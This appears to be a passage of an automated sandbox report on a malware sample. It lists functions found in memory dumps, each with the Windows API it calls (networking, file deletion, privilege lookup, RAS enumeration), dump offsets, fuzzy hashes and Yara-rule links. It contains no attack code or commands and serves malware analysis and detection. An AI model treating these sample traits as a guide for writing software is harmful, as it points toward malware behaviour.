Function 04CE14A4, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04CE1504

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 1a357ae2a6cc98f8a20d9b7d5ae3336b63d7b015e605ae6c28522d903acae9da
Instruction ID: 57f43c640280b5f15fac862312be859046677182f4d2d01c8603dc57f075ea58
Opcode Fuzzy Hash: 1a357ae2a6cc98f8a20d9b7d5ae3336b63d7b015e605ae6c28522d903acae9da
Instruction Fuzzy Hash: B9119D72409384AFDB22CF55DC44B62FFF4EF06220F0888AEED858B162C375A518CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE301E, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetPerAdapterInfo.IPHLPAPI(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE3077

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: AdapterInfo
String ID:
API String ID: 3405139893-0
Opcode ID: a60bd041e2807b70397324825ae5ad5a29ff383bc527589af5cdc84187febe15
Instruction ID: fd0af5b847bba778547443d053b420dbe645d4e624ad6b282992991fe9e32ecd
Opcode Fuzzy Hash: a60bd041e2807b70397324825ae5ad5a29ff383bc527589af5cdc84187febe15
Instruction Fuzzy Hash: B311E1B1504344AFEB218F16DC85F76FBA8EF04320F18846AED455B256D374F504CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE3506, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE355F

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: a60bd041e2807b70397324825ae5ad5a29ff383bc527589af5cdc84187febe15
Instruction ID: b41c396b136bfc03ed00339a7bde67b33e5f295bf1e8eec94ac6ffaca32d43ec
Opcode Fuzzy Hash: a60bd041e2807b70397324825ae5ad5a29ff383bc527589af5cdc84187febe15
Instruction Fuzzy Hash: BD11CEB1600344AFEB218F16CC85B66FBA8EF44320F18846AED455B256D374F504CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE52F6, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 04CE533E

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7c8d3b3922e5adbc2991dde2799c99ad321a579cfd26ed96cf2c1f085a86af76
Instruction ID: 1795fa4dabd3ea89ac7a98939401a1f71f31e80fdb26fc12652cd69aa959c0fc
Opcode Fuzzy Hash: 7c8d3b3922e5adbc2991dde2799c99ad321a579cfd26ed96cf2c1f085a86af76
Instruction Fuzzy Hash: 7E1182766003009FDB20CF6AD845766FBD8EF04324F48846ADC45CB645E374E504CA71

Uniqueness

Uniqueness Score: -1.00%

Function 04CE2D72, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 04CE2DC8

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 6f4c463d958813c274ff5198a5897681ec2fe2e25d4728086d7cc4a8b4843d81
Instruction ID: 4a31ae5d1828f0d1eaafd367d2845aa9ac677c633eebc8f1adb6fe7486a33bf1
Opcode Fuzzy Hash: 6f4c463d958813c274ff5198a5897681ec2fe2e25d4728086d7cc4a8b4843d81
Instruction Fuzzy Hash: 5D01C871500304AFEB21DF16DC45B66FBACEF44720F14849AEE455B286D774E504CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00CBBD42, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,F9700A6C,00000000,00000000,00000000,00000000), ref: 00CBBD95

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 110b6298bf675e02313f796ccde12236919a46c11118dee119ac329cdc86254d
Instruction ID: 1548a69e1d22003a23ecb64cf75df00bd2dc94774f4bbba1d48fce2c402e77bb
Opcode Fuzzy Hash: 110b6298bf675e02313f796ccde12236919a46c11118dee119ac329cdc86254d
Instruction Fuzzy Hash: 8B01F975500304AFE721CF26DC45BA6FB98DF04720F54C456ED459B24AD7B8E904CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE3E02, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04CE3E4E

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: bb3fa73803f500af97afe864cd3dd5e961cd235f7ecc9195fc6ec23eb702cbd7
Instruction ID: c6ffe82e5927153b594652ecea37cb238ff3952eaf5d86ffe6281dc7b653a319
Opcode Fuzzy Hash: bb3fa73803f500af97afe864cd3dd5e961cd235f7ecc9195fc6ec23eb702cbd7
Instruction Fuzzy Hash: CC115A725003809FDB20CF56D884B62FBE5EF08320F0888AADD858B626D335F518DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA9F0, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00CBAA4A

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: e337debd84d096bbfedc96c89fc2bb2ce3409ed6322c2870254047a72af1e972
Instruction ID: 9b8488edfc216a76811ac843b111fce2a7cac4e97e99a0ae5a69fe65b477d01c
Opcode Fuzzy Hash: e337debd84d096bbfedc96c89fc2bb2ce3409ed6322c2870254047a72af1e972
Instruction Fuzzy Hash: 7F11AC314083849FC7228F15DC84A52FFB4EF06320F08C49AED854B262C375A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4A76, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 04CE4AB3

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 78845ecd825114aabcd8868e6abd66b72ba95759636bafc7675597ee5600d2ae
Instruction ID: c2633bd6427735587d35cb3515601815b050d1dc0ef11128b90f5213a30500ab
Opcode Fuzzy Hash: 78845ecd825114aabcd8868e6abd66b72ba95759636bafc7675597ee5600d2ae
Instruction Fuzzy Hash: 61018C756043008FEB64CF6AD885766FBE8EF04230F0884BADD49CB646E378E504DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E2C,?,?), ref: 00CBA1C2

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: ab0f383759867fa9fa84de1cc62d9954430f7b18ff14d4996070a4a6e2a08398
Instruction ID: f3f1b1e4c0ca61a09d9b30a19cb4d15db6ec03c243438a26e05a2fe3ab5868b9
Opcode Fuzzy Hash: ab0f383759867fa9fa84de1cc62d9954430f7b18ff14d4996070a4a6e2a08398
Instruction Fuzzy Hash: 3F01B171500600ABD710DF1ADC82B36FBA8FB88A20F14816AED088B641D231F916CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04CE327E, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 04CE32CE

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: b3f295c68e3f2af6591a070147b24258ed720ad3092345cbae7da7929848d0c2
Instruction ID: b6540642259aa9dbac24c16fc9d01c87907c4ed86c7dde81a1410aade7f2f7ea
Opcode Fuzzy Hash: b3f295c68e3f2af6591a070147b24258ed720ad3092345cbae7da7929848d0c2
Instruction Fuzzy Hash: 69017171500604ABD714DF1ADC86B36FBA8FB89B20F14856AED089B641D231F916CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 04CE141E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04CE146E

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 555ea58452185bf239ae9e752eea2dda5c6431e982606cbfc523abd5edbdd6a9
Instruction ID: cc0e9631273c966cef2b4fedc751630a7c87155a204e0f9e64fdfc7c066f751d
Opcode Fuzzy Hash: 555ea58452185bf239ae9e752eea2dda5c6431e982606cbfc523abd5edbdd6a9
Instruction Fuzzy Hash: 49017171500604ABD714DF1ADC86B36FBA8FB89B20F14856AED089B641D231F916CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04CE574E, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 04CE5788

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 4000d0ba0d99c8363f0b0aa0281f8d5882f3d7513de26825ec1f1fe4222b2c7a
Instruction ID: 88196df010fc55e3d4999ee741e712b72be13d052ab1e6cde571e5dc42fca55e
Opcode Fuzzy Hash: 4000d0ba0d99c8363f0b0aa0281f8d5882f3d7513de26825ec1f1fe4222b2c7a
Instruction Fuzzy Hash: B9019E75600340EFDB50CFAAD885766FBD8EF04624F1884AADC49CF646E378E514CA61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE1A9E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04CE1AE9

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 243ff70c1b48706bccb5f3f68427f61d151784f48b8a085e77ed33dd95c318d2
Instruction ID: c015730c9f20d3c8a8714a0aec83ffc88cf77b4e4d0e611b5b7a896e55f850ae
Opcode Fuzzy Hash: 243ff70c1b48706bccb5f3f68427f61d151784f48b8a085e77ed33dd95c318d2
Instruction Fuzzy Hash: F90157B16002009FDB20CE1AD885B22FBE8EB04620F0C81AADD498B656E775E558DA72

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA5D6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CBA61A

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 02d556a7975de14a2115c9b7c8f6a4d77374904e8de60a325f4a87d698e279fd
Instruction ID: c754b270d77ead9aec9422b705da451682794dcc2d256f7168ccfa1d60a4849c
Opcode Fuzzy Hash: 02d556a7975de14a2115c9b7c8f6a4d77374904e8de60a325f4a87d698e279fd
Instruction Fuzzy Hash: CE016D714007009FDB218F96D844B56FFE0EF08720F18C8AAED894B616D375E414DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB952, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 00CBB990

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 796f8ffbd67fb08e581a2011d1ba9695f2b8fcff5c8335f24954f05905685ecf
Instruction ID: 72dcb1d70ad9a9fa8aaf765ee50152ba6611f79a2c6669e15f7e8245752fb594
Opcode Fuzzy Hash: 796f8ffbd67fb08e581a2011d1ba9695f2b8fcff5c8335f24954f05905685ecf
Instruction Fuzzy Hash: CF0140719047409FDB21CF56D844B56FBB4EF04320F1884AADE894B616D375A918DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA2FA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00CBA32C

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d3fb8dd55c29fbe1aa70de6c621417b87d685ff3b2cdb3d3b6dc17a380467d06
Instruction ID: 15e31cbf22f0798657a4f9411ed47a1ce49cfe3c05e47de9cfb3605f4cd3a153
Opcode Fuzzy Hash: d3fb8dd55c29fbe1aa70de6c621417b87d685ff3b2cdb3d3b6dc17a380467d06
Instruction Fuzzy Hash: 4A0184755043408FDB10CF5AD8857A6FBD4EF04730F18C4AADD458F666D774E544CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB7B2, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 00CBB802

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2fd9da2d7ccab79c009f7d6d87362ce79585f974e9cebd7a38e83543d8ba6297
Instruction ID: 79878286da78fdfe16706dd59d055621043823121b2b4e53dae40ce6c18a74a0
Opcode Fuzzy Hash: 2fd9da2d7ccab79c009f7d6d87362ce79585f974e9cebd7a38e83543d8ba6297
Instruction Fuzzy Hash: 4701AD71500604ABD224DF1ADC82B36FBE8FB89B20F14811AED084B741E371F916CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 04CE14C6, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04CE1504

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 95ecb7b2c35a64aa381bf46d0ecec268d6953067573f93f1fdbb54f9feea3dee
Instruction ID: a77aa4013e1432ca6b29c97fdccf116b1703dea74fee5bb856427fd6bd376cd0
Opcode Fuzzy Hash: 95ecb7b2c35a64aa381bf46d0ecec268d6953067573f93f1fdbb54f9feea3dee
Instruction Fuzzy Hash: 1B018C725013449FDB21CF56E844B66FBA0EF08320F0888AADD864B616E775A518DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE285C, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 04CE28A9

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1cc176f8026408ddd1f0a838b097096d908a4bb18356334c33c8ad43b500ea1b
Instruction ID: 11a11aee154d5b447b7788ab9cbb66be24912155f057690357ec2dade112ff44
Opcode Fuzzy Hash: 1cc176f8026408ddd1f0a838b097096d908a4bb18356334c33c8ad43b500ea1b
Instruction Fuzzy Hash: AF014C76500744AFEB218F06DC85F62FBA8EB48720F08859EEE454A616C375A558CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04CE01D6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNELBASE(?,00000E2C,?,?), ref: 04CE0221

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: ada02d9b4cd7b0aa44188262bce8089117c704bcff85f0cc2314256fe4e37b7b
Instruction ID: 816af054d74005e967f0d7f507cb55d8148ec55e484afedb7f70554908571729
Opcode Fuzzy Hash: ada02d9b4cd7b0aa44188262bce8089117c704bcff85f0cc2314256fe4e37b7b
Instruction Fuzzy Hash: 8601AD71500604ABD624DF1ADC82B36FBE8FB89B20F14815AED084B741E231F916CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 04CE210A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 04CE215A

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: bb9bb14d97a6bec5c5253f7ae086eef7a0231e1de06c62aff8e1346916a7826b
Instruction ID: a0c073a0f1fcd3ef71c7576bbe3192291ca406a93348b9d04cb52583b1340d41
Opcode Fuzzy Hash: bb9bb14d97a6bec5c5253f7ae086eef7a0231e1de06c62aff8e1346916a7826b
Instruction Fuzzy Hash: 4C01A271500604ABD214DF1ADC82B36FBE8FB89B20F14811AED084B741D231F516CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4F06, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 04CE4F44

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 521c4f2487308951465e6e08e25feeecc8575c3da7ca7ae1a0cc403d34532afb
Instruction ID: 26861c24574d6570e69535b034912a8f7164f6d4e31f3a53dd7f5491c9501246
Opcode Fuzzy Hash: 521c4f2487308951465e6e08e25feeecc8575c3da7ca7ae1a0cc403d34532afb
Instruction Fuzzy Hash: 86019E356007009FDB248F56D844B66FBA1EF04720F08C4AAED864A666D375F518DF62

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4E52, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04CE4E8D

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 69ba4996328888317e0466a5708d48f606c002f569ec12aa18e08dcc326c94d0
Instruction ID: 20f3db1ac437053592498cd1678fe113d50953c44c03aa448b85f49ba9a4c21c
Opcode Fuzzy Hash: 69ba4996328888317e0466a5708d48f606c002f569ec12aa18e08dcc326c94d0
Instruction Fuzzy Hash: E901BC356007008FDB208F56D985B66FBA4EF08320F08C0AEDE464BA66D375E418DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA8AE, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00CBA8E0

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: bf9a913fc571aaef10b23479d9b87bca4528e8e61c7fdf1b623e71984db7e0f1
Instruction ID: ad59867933dff7c4bc20c3d56bd886203c0de7763bce2f4c5ac7258b4244571c
Opcode Fuzzy Hash: bf9a913fc571aaef10b23479d9b87bca4528e8e61c7fdf1b623e71984db7e0f1
Instruction Fuzzy Hash: 1C01AD709043409FDB20CF5AD8857A6FBA4EF04320F18C4AADD898F656D379A904CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE4DB2, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,F9700A6C,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 04CE4DE4

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 80a05da0b4fdf0b2e4afc31642d69cc2cf11f15c73952f6d020701c84a90b4a3
Instruction ID: 42fede387868cc56190a9ac114577f15db30bd7cf4835bc27af45cef2ff74fae
Opcode Fuzzy Hash: 80a05da0b4fdf0b2e4afc31642d69cc2cf11f15c73952f6d020701c84a90b4a3
Instruction Fuzzy Hash: D501AD356007009FDB248F1AD985762FBA4EF04220F08C0AADD4A8B756D374E518CA72

Uniqueness

Uniqueness Score: -1.00%

Function 04CE286E, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 04CE28A9

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3694a00243192970843d9cea71b3c603d0fbcf0d381344ae3d674fe267fcf948
Instruction ID: 7179e8d2daeb7b74e7ab0d5203c09b47ce9be26db3bcfb0f27bb5c13bcf86634
Opcode Fuzzy Hash: 3694a00243192970843d9cea71b3c603d0fbcf0d381344ae3d674fe267fcf948
Instruction Fuzzy Hash: F80178369003049FEB308F46D885B26FBA4EF08320F08849ADD490A626D375A559DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAA12, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 00CBAA4A

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 31e004413a7397b3eeb846fb1cb234bd107bb72d3a4d97e2b8d5d3558205980c
Instruction ID: c308d339dfca82e8df26f7672a8f67ad107d79f0a1e59fb9296b9597a6c1b7da
Opcode Fuzzy Hash: 31e004413a7397b3eeb846fb1cb234bd107bb72d3a4d97e2b8d5d3558205980c
Instruction Fuzzy Hash: 7F01AD355003008FDB208F46D985766FFA0EF04720F18C09ADD850B656D375A908EFB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CBA69A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00CBA6CC

Memory Dump Source

Source File: 00000004.00000002.920828594.0000000000CBA000.00000040.00000001.sdmp, Offset: 00CBA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: d11d99e415cc827968c7b6c1655c7c42d267e5323af7f5a76a164765062ab739
Instruction ID: 8396a7de81c207ce0e303e1c0cb34da2b78b4e9e36de25adc4cc6f3b3b1c9dd1
Opcode Fuzzy Hash: d11d99e415cc827968c7b6c1655c7c42d267e5323af7f5a76a164765062ab739
Instruction Fuzzy Hash: 67F08C745043409FDB209F06D8857A2FFA0EF04320F18C09AED894B656E279A548CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CE5072, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 04CE50A4

Memory Dump Source

Source File: 00000004.00000002.923666062.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 88a1559b94f0e7372f6aef1b054b1c0e08f32f74ad8602652b33e73d1f16fded
Instruction ID: 3223f45814cd6965309612fb56286ca1148ade1e472b198f65f7365bf2b4dd3a
Opcode Fuzzy Hash: 88a1559b94f0e7372f6aef1b054b1c0e08f32f74ad8602652b33e73d1f16fded
Instruction Fuzzy Hash: A5F08C74A04340AFDB208F56D885765FFA0EF04224F18C09AED494B656E3B9A508CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 04CB0898, Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

:@fq, xrefs: 04CB09C8

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID: :@fq
API String ID: 0-3673016210
Opcode ID: b62d08902b4114ace88408b42e9d1f2afa9ea2318ad0956a394285b9a6a78130
Instruction ID: 7ae0dfd4f70e435bafa94517464aa987f841c36d9d54331c9704a459268ff8f1
Opcode Fuzzy Hash: b62d08902b4114ace88408b42e9d1f2afa9ea2318ad0956a394285b9a6a78130
Instruction Fuzzy Hash: 8F91D174E01218CFDB14DFAAC894BADBBB2BF49310F14856AE409AB394DB31A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2477, Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

jq 2, xrefs: 00CB2511

Memory Dump Source

Source File: 00000004.00000002.920811414.0000000000CB2000.00000040.00000001.sdmp, Offset: 00CB2000, based on PE: false

Similarity

API ID:
String ID: jq 2
API String ID: 0-2109718334
Opcode ID: 2d0714c7633897f57946dc81acb5880afa9a340ca18ebf1ab5d15360f9b3ae27
Instruction ID: c585cfe6e3c9f598857bd84254856a83e58502f5a866a982b9562e7f73b764ca
Opcode Fuzzy Hash: 2d0714c7633897f57946dc81acb5880afa9a340ca18ebf1ab5d15360f9b3ae27
Instruction Fuzzy Hash: 9A11D67694D3C1AFD723563428392E5BFB19F93721F4A40CBE4848F5D3E148584B8762

Uniqueness

Uniqueness Score: -1.00%

Function 04CB9DB0, Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c373a6f9ea1cda43fe048f93cb77d658042f14a134a04cab986f5dfce7d274c9
Instruction ID: 5e173f7e2b1089b6b13eef961c805d4ef4c593996eb5531e1f11cd793bb0f4b7
Opcode Fuzzy Hash: c373a6f9ea1cda43fe048f93cb77d658042f14a134a04cab986f5dfce7d274c9
Instruction Fuzzy Hash: 91D1B374E01218CFDB64DFA9C984BDDBBB2BF49304F1085AAD409AB355DB35AA81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04CB5B80, Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbbd6b198381ad36f4cfaece31151eb0bb00fc43c063c62060128a47790bee15
Instruction ID: 10740c74e7d83e2085fbd28f6ba6930a0ca86823b6e6a1a6b3c71b728c2877db
Opcode Fuzzy Hash: cbbd6b198381ad36f4cfaece31151eb0bb00fc43c063c62060128a47790bee15
Instruction Fuzzy Hash: D9D1B174E01218CFDB54DFA9C894BDDBBB2BF49304F1085AAD409AB395DB34AA81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04CB79D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.923606033.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7ba82298a4e49637a4e7ca5aed46e650f7082dfbb78b94cd3d3c7d911f3faa5
Instruction ID: 8c91169262938e97eac5965b218e47eb685adf43701794c0b064989363744e82
Opcode Fuzzy Hash: d7ba82298a4e49637a4e7ca5aed46e650f7082dfbb78b94cd3d3c7d911f3faa5
Instruction Fuzzy Hash: CB91B074E01208DFDB14DFA9D994B9DBBF2BF89304F2480AAD808AB365DB719941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04CB4490, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

